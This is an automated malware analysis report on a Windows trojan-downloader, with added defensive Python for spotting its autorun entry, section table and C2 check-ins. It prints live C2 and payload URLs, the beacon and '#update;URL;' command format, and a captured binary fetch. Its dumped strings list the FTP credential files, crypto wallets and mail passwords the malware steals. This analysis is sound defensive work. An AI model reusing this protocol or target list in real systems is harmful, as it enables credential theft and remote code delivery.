Trojan.Win32.Yakes.lhpr (Kaspersky), Trojan.Generic.14918644 (B) (Emsisoft), Trojan-Downloader.Win32.Moure.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 1784a24cb1de74990d64c9681a0d52f9
SHA1: 0da515afb8b0e960a0d39d6050db87b0ba466e2b
SHA256: ad5f5fc0da1832175eaa589b1751b5d56c8cf6a8a1c9047821d04a4df518c655
SSDeep: 1536:stDiorTuf5 E3Pkc1f3ZVldwl8gu35ZnHUWNbM8GVD37Ue1zZaR8crQ TeNZPm/ :stDhCJ3KEBUW1Gl7xViKlN6WXIj
Size: 105984 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-03 21:48:15
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-Downloader creates the following process(es):
%original file name%.exe:1096
vrsvps.exe:1932
vrsvps.exe:1924
The Trojan-Downloader injects its code into the following process(es):
wuauclt.exe:656
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1096 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe (601 bytes)
Registry activity
The process %original file name%.exe:1096 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 F6 20 F4 A5 3E 2F BF 5D 48 ED D8 60 05 CF B1"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
To run itself automatically each time Windows boots, the Trojan-Downloader adds a link to its file under the following system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"" = "%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe -a"
The process vrsvps.exe:1932 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 35 A6 47 B2 E1 76 8B AE CB 41 B3 47 C5 64 AC"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "vrsvps.exe"
The process vrsvps.exe:1924 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 00 EC F4 86 B9 28 38 F3 14 A3 09 76 51 4E 17"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "vrsvps.exe"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1096
vrsvps.exe:1932
vrsvps.exe:1924
- Delete the original Trojan-Downloader file.
- Delete or disinfect the following files created/modified by the Trojan-Downloader:
%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe (601 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"" = "%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe -a"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
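The autorun entry above has two traits worth checking for on other hosts: it is stored under the Run key's default (empty) value name, so it shows up as "<NO NAME>" or "(Default)" rather than as a named entry, and it points into the user's Local Settings\Application Data tree, i.e. it was installed without administrative rights. The following Python is an added example, not part of the Lavasoft report: it parses the text that `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` prints, flags entries with either trait, and emits the matching `reg delete` command (the default value is removed with /ve, not /v). The sample reg.exe output, the user name and the benign ctfmon.exe entry are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# output on a host carrying the autorun value from this report, plus one benign entry
# for contrast. Not captured from a real machine. Windows XP prints the key's default
# value as "<NO NAME>"; Vista and later print "(Default)".
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    <NO NAME>    REG_SZ    C:\Documents and Settings\user\Local Settings\Application Data\vrsvps\vrsvps.exe -a
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
"""

# reg.exe separates value name, type and data with four spaces.
_VALUE_RE = re.compile(r"^\s{4}(?P<name>.*?)\s{4}(?P<type>REG_[A-Z_]+)\s{4}(?P<data>.*)$")

# Profile directories a standard user can write to (XP and Vista+ layouts). An autorun
# entry whose executable lives here was installed without administrative rights.
USER_WRITABLE = (
    "\\local settings\\application data\\",
    "\\local settings\\temp\\",
    "\\appdata\\local\\",
    "\\appdata\\roaming\\",
)


def parse_reg_query(text: str) -> List[Tuple[str, str, str]]:
    """Turn reg.exe output into (value name, type, data) triples; default value -> ''."""
    entries = []
    for line in text.splitlines():
        m = _VALUE_RE.match(line)
        if not m:
            continue
        name = m.group("name")
        if name in ("<NO NAME>", "(Default)"):
            name = ""
        entries.append((name, m.group("type"), m.group("data").strip()))
    return entries


def split_command(data: str) -> Tuple[str, str]:
    """Split a Run value into (executable path, arguments); handles quoted paths."""
    data = data.strip()
    if data.startswith('"') and data.count('"') >= 2:
        end = data.find('"', 1)
        return data[1:end], data[end + 1:].strip()
    idx = data.lower().find(".exe")
    if idx == -1:
        return data, ""
    return data[:idx + 4], data[idx + 4:].strip()


def removal_command(name: str) -> str:
    """reg.exe command that deletes the value; the default value needs /ve, not /v."""
    if name == "":
        return f'reg delete "{RUN_KEY}" /ve /f'
    return f'reg delete "{RUN_KEY}" /v "{name}" /f'


def flag_run_entries(entries: List[Tuple[str, str, str]]) -> List[Dict[str, object]]:
    """Report entries that match the persistence pattern seen in this sample."""
    findings = []
    for name, _vtype, data in entries:
        exe, args = split_command(data)
        reasons = []
        if name == "":
            reasons.append("stored under the key's default (empty) value name")
        if any(d in exe.lower() for d in USER_WRITABLE):
            reasons.append("executable is in a user-writable profile directory")
        if reasons:
            findings.append({"name": name, "exe": exe, "args": args,
                             "reasons": reasons, "remove": removal_command(name)})
    return findings


if __name__ == "__main__":
    for f in flag_run_entries(parse_reg_query(SAMPLE_REG_QUERY)):
        print(f["exe"], f["args"], "|", "; ".join(f["reasons"]), "|", f["remove"])
```

Deleting the value only stops the next reboot from relaunching the file; the running vrsvps.exe processes and the code injected into wuauclt.exe:656 still have to be terminated, as the removal steps above say.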
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.ihuzseh | 4096 | 83112 | 83456 | 4.84191 | 4469bd475345986feeb9852d888f6179 |
.rdata | 90112 | 16152 | 16384 | 2.59772 | e81e6e057791bc6790945f4256b44c96 |
.data | 106496 | 18508 | 4608 | 1.60315 | 59b5f5e9b558e6eeda46d72dc9059601 |
.rsrc | 126976 | 16 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
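The section table is worth a second look even though the overall entropy reads "Not Packed": the code section carries a randomized name (.ihuzseh where .text normally sits), which together with the UPolyX PEiD match points at a crypter, and .rsrc holds only 16 bytes at entropy 0, consistent with the empty VersionInfo above. The raw sizes also sum to 104960 bytes, which with a 1024-byte header equals the 105984-byte file size, so there is no overlay. The Python below is an added example, not code from the report or from Lavasoft: it parses section headers straight from the PE header bytes with struct (no pefile dependency) and applies those checks. The header it parses is constructed from the table above; the first section's raw offset of 0x400 and the Characteristics flags are assumptions, since the report does not list them.

```python
import math
import struct
from collections import Counter
from typing import Dict, List

FILE_SIZE = 105984   # sample size from the report
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".bss", ".tls", ".CRT"}

# Section table from the report: (name, VirtualAddress, VirtualSize, SizeOfRawData,
# Characteristics). The flags are an assumption (code/exec for the first section,
# read-only and read/write data for the rest); the report does not list them.
REPORTED_SECTIONS = [
    (".ihuzseh", 4096, 83112, 83456, 0x60000020),
    (".rdata", 90112, 16152, 16384, 0x40000040),
    (".data", 106496, 18508, 4608, 0xC0000040),
    (".rsrc", 126976, 16, 512, 0x40000040),
]


def build_sample_header(sections) -> bytes:
    """Constructed minimal PE header carrying just what parse_sections() reads.
    SizeOfOptionalHeader is 0 here so the section headers follow the COFF header;
    a real PE32 file has a 224-byte optional header in between. Raw data is laid
    out contiguously from file offset 0x400 (assumed 512-byte file alignment)."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    out = bytes(dos) + coff
    raw_ptr = 0x400
    for name, vaddr, vsize, raw_size, chars in sections:
        out += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, vaddr,
                           raw_size, raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += raw_size
    return out


def parse_sections(blob: bytes) -> List[Dict[str, int]]:
    """Walk DOS header -> PE signature -> COFF header -> 40-byte section headers."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe_off = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsec = struct.unpack_from("<H", blob, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", blob, pe_off + 20)[0]
    off = pe_off + 24 + opt_size
    sections = []
    for _ in range(nsec):
        (name, vsize, vaddr, raw_size, raw_ptr,
         _r, _l, _nr, _nl, chars) = struct.unpack_from("<8sIIIIIIHHI", blob, off)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr,
                         "vsize": vsize, "raw_size": raw_size, "raw_ptr": raw_ptr,
                         "chars": chars})
        off += 40
    return sections


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform); >= 7 suggests packing/encryption."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage(sections: List[Dict[str, int]], file_size: int, blob: bytes = b"") -> List[str]:
    """Heuristics a first look at the section table should raise."""
    findings = []
    for s in sections:
        if s["name"] not in STANDARD_NAMES:
            findings.append(f'{s["name"]}: non-standard section name')
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f'{s["name"]}: writable and executable')
        if s["name"] == ".rsrc" and s["vsize"] <= 16:
            findings.append(".rsrc: effectively empty, no version info or icon")
        body = blob[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]]
        if s["raw_size"] and len(body) == s["raw_size"] and shannon_entropy(body) >= 7.0:
            findings.append(f'{s["name"]}: high entropy, likely packed')
    end = max((s["raw_ptr"] + s["raw_size"] for s in sections), default=0)
    if file_size > end:
        findings.append(f"overlay: {file_size - end} bytes after the last section")
    elif file_size < end:
        findings.append("section data extends past end of file (truncated)")
    return findings


SAMPLE_HEADER = build_sample_header(REPORTED_SECTIONS)

if __name__ == "__main__":
    for line in triage(parse_sections(SAMPLE_HEADER), FILE_SIZE, SAMPLE_HEADER):
        print(line)
```

Run against a full file rather than the constructed header, triage() also computes per-section entropy from the raw bytes, which is how the 4.84 / 2.60 / 1.60 / 0 figures in the table are obtained.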
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://pro7778.com/pro/getter.php?mode=reg&id=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&os=5132&vga=VMware SVGA II&ocl=0&skype=0 | 153.92.96.79 |
hxxp://glennmetales.com/backup/xmlrpc/css/file.exe | 50.63.40.1 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /backup/xmlrpc/css/file.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: glennmetales.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 11 Sep 2015 09:10:29 GMT
Server: Apache
Last-Modified: Mon, 03 Aug 2015 18:50:36 GMT
ETag: "19e00-51c6ca52fb629"
Accept-Ranges: bytes
Content-Length: 105984
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........dd.f.7.f.7.f.7...7.f.7...7.f.7...7.f.7.f.7.f.7...7.f.7...7.f.7...7.f.7Rich.f.7........................PE..L...o..U.................F..........g........`....@.....................................................................................................................................................@............`..$............................ihuzseh.D.......F.................. ..`.rdata...?...`...@...J..............@..@.data...LH..........................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................Hl0xWBCK9Xs1kHF/alxi mMFWUeP9lTzueOaaB1h302sN10VcA9IQylC9XZBq14A7tI2w/UCNl7MOASra1XaKpQuyHm7qrDu6DKczOovVOMEidFsnVhpa0MpxW1mz/QcUM7gLfKi036RebenVKEMVZ FLSmJeFSFCUtx91Xi7e9JYM5UlftcFqR084RpgAxFaeAine2CeS Yq6O3bYPwSgl5Wb0mYWUagtBapYcNA/GL17rHhpwmUvJf/Z7EVGWKO5a3pbSHKGOnUMATKNobCdGJrDv0hb8ikw1XrwwzEMfFvymrftGDaQKfE piPGHOiD1DFc avuxgrI6Y62HJi3zh4sRkYQjbGmfdClSApCek9JiGU1hil7Ghb3EKz2bCTTo bk/xzaiqvnS36U2rtfskYFPSmCYy5P/mXklvsuFdEW0KfNBvTVJkj5UGhXcX1j/C8panMaGiDRa6IM9rfYl1Gw4Q0CEA9WIulQ0FTU57sylVv00/QjfNIyyJG5Kl
<<< skipped >>>
GET /pro/getter.php?mode=reg&id=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&os=5132&vga=VMware SVGA II&ocl=0&skype=0 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: pro7778.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Sep 2015 09:10:29 GMT
Content-Type: text/html
Content-Length: 59
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding,User-Agent
#update;hXXp://glennmetales.com/backup/xmlrpc/css/file.exe;
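The capture shows the whole check-in cycle: a registration request to getter.php (mode=reg, a per-victim GUID id, an OS code, the video adapter name, and OpenCL and Skype flags), a 59-byte reply of the form #update;URL;, and an immediate fetch of that URL, whose Content-Length of 105984 equals the size of the analyzed sample. The strings recovered from the injected wuauclt.exe region further down also carry mode=report, so at least two modes exist. Note that vga=VMware SVGA II tells the operator the victim is a virtual machine, which is a simple way to withhold payloads from sandboxes. The Python below is an added example, not code from the report or from Lavasoft: it parses the beacon query, parses the #command;arg; reply format, and runs both over proxy log lines to tie a check-in to the payload fetch that follows it. The proxy log layout and client addresses are constructed; the defanged hXXp in the captured reply is restored to http in the constructed body.

```python
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Query keys the check-in in the capture carries: mode, bot id, OS code, video adapter,
# OpenCL and Skype flags. The key set is the signature; the values vary per victim.
BEACON_KEYS = {"mode", "id", "os", "vga", "ocl", "skype"}

# Constructed: a proxy log in a simple "time client method url" layout, with the two
# requests recorded in the capture plus an unrelated one. Not a real log.
SAMPLE_PROXY_LOG = """\
2015-09-11T09:10:29Z 10.0.0.7 GET http://pro7778.com/pro/getter.php?mode=reg&id=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&os=5132&vga=VMware%20SVGA%20II&ocl=0&skype=0
2015-09-11T09:10:29Z 10.0.0.7 GET http://glennmetales.com/backup/xmlrpc/css/file.exe
2015-09-11T09:11:02Z 10.0.0.9 GET http://www.example.com/index.html
"""

# The 59-byte body the C2 returned to the registration above (defanging removed).
SAMPLE_C2_REPLY = "#update;http://glennmetales.com/backup/xmlrpc/css/file.exe;"


def parse_beacon(url: str) -> Optional[Dict[str, str]]:
    """Return the check-in fields if `url` matches the getter.php beacon, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/getter.php"):
        return None
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if not BEACON_KEYS.issubset(params):
        return None
    params["host"] = parts.hostname or ""
    return params


def parse_c2_reply(body: str) -> List[Tuple[str, List[str]]]:
    """Parse the '#command;arg;...' reply format into (command, args) pairs."""
    commands = []
    for chunk in body.split("#"):
        fields = [f.strip() for f in chunk.split(";")]
        fields = [f for f in fields if f]          # the trailing ';' leaves an empty field
        if fields:
            commands.append((fields[0], fields[1:]))
    return commands


def scan_proxy_log(text: str, c2_reply: str = "") -> List[Dict[str, str]]:
    """Flag check-ins, and fetches of any URL the C2 handed out in `c2_reply`."""
    payload_urls = {args[0] for cmd, args in parse_c2_reply(c2_reply)
                    if cmd == "update" and args}
    findings = []
    for line in text.splitlines():
        try:
            ts, client, _method, url = line.split(maxsplit=3)
        except ValueError:
            continue
        beacon = parse_beacon(url)
        if beacon is not None:
            findings.append({"time": ts, "client": client, "kind": "c2-checkin",
                             "host": beacon["host"], "bot_id": beacon["id"],
                             "mode": beacon["mode"], "vga": beacon["vga"]})
        elif url in payload_urls:
            findings.append({"time": ts, "client": client, "kind": "payload-fetch",
                             "host": urlsplit(url).hostname or "", "url": url})
    return findings


if __name__ == "__main__":
    for f in scan_proxy_log(SAMPLE_PROXY_LOG, SAMPLE_C2_REPLY):
        print(f)
```

Matching on the key set rather than on pro7778.com keeps the check useful after the domain changes; the GUID in the id field is the same one that appears in the injected-code strings and is a per-infection identifier, not a fixed indicator.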
Map
The Trojan-Downloader connects to the servers at the following location(s):
Strings from Dumps
wuauclt.exe_656:
.text
`.data
.rsrc
@.reloc
wuauclt.pdb
GetProcessHeap
KERNEL32.dll
_wcmdln
_amsg_exit
msvcrt.dll
ntdll.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
USER32.dll
OLEAUT32.dll
SHLWAPI.dll
zcÃ
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
true
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ShowWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
wucltui.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
kernel32.dll
WUWeb
Report
7.6.7600.256
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
shell32.dll
%s: %s [
%s: %s
%s\%s
= Module: %s
= Module:
= Process: %s
= Process:
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Done enumerating windows
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
hd-hd-hd%chd:hd:hd:hd
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
Windows
Operating System
wuauclt.exe_656_rwx_000A0000_00009000:
.text
`.rdata
@.data
.reloc
ntdll.dll
kernel32.dll
KERNELBASE.dll
=#= =:=[=
Kernel32.dll
Advapi32.dll
Shlwapi.dll
Shell32.dll
User32.dll
WS2_32.dll
Winhttp.dll
Setupapi.dll
Psapi.dll
Crypt32.dll
msvcrt.dll
OpenCL.dll
hXXp://pro7778.com/pro/getter.php
mode=report
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
SysWOW64\svchost.exe
System32\wuauclt.exe
\Software\Microsoft\Windows\CurrentVersion\Run
ClassicFTP
HKCU\Software\NCH Software\ClassicFTP\FTPAccounts
CoreFTP
HKCU\Software\FTPWare\CoreFTP\Sites
FileZilla\sitemanager.xml
CuteFTP
Globalscape\CuteFTP\9.0\sm.dat
Cyberduck\Bookmarks\*.duck
FlashFXP\5\Sites.dat
FlashFXP\5\quick.dat
LeapFTP
LeapWare\LeapFTP\sites.dat
NppFTP
Notepad \plugins\config\NppFTP\NppFTP.xml
VoyagerFTP
RhinoSoft\FTP Voyager\FTPVoyager.Archive
SmartFTP
SmartFTP\Client 2.0\Favorites\*.xml
SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml
TotalCmdr
GHISLER\wcx_PTF.ini
WS_FTP
Ipswitch\WS_FTP\Sites\ws_PTF.ini
Bitcoin\wallet.dat
Litecoin\wallet.dat
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
export "
reg.exe
SMTP User
SMTP Password
IMAP Password
POP3 Password
75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
vrsvps.exe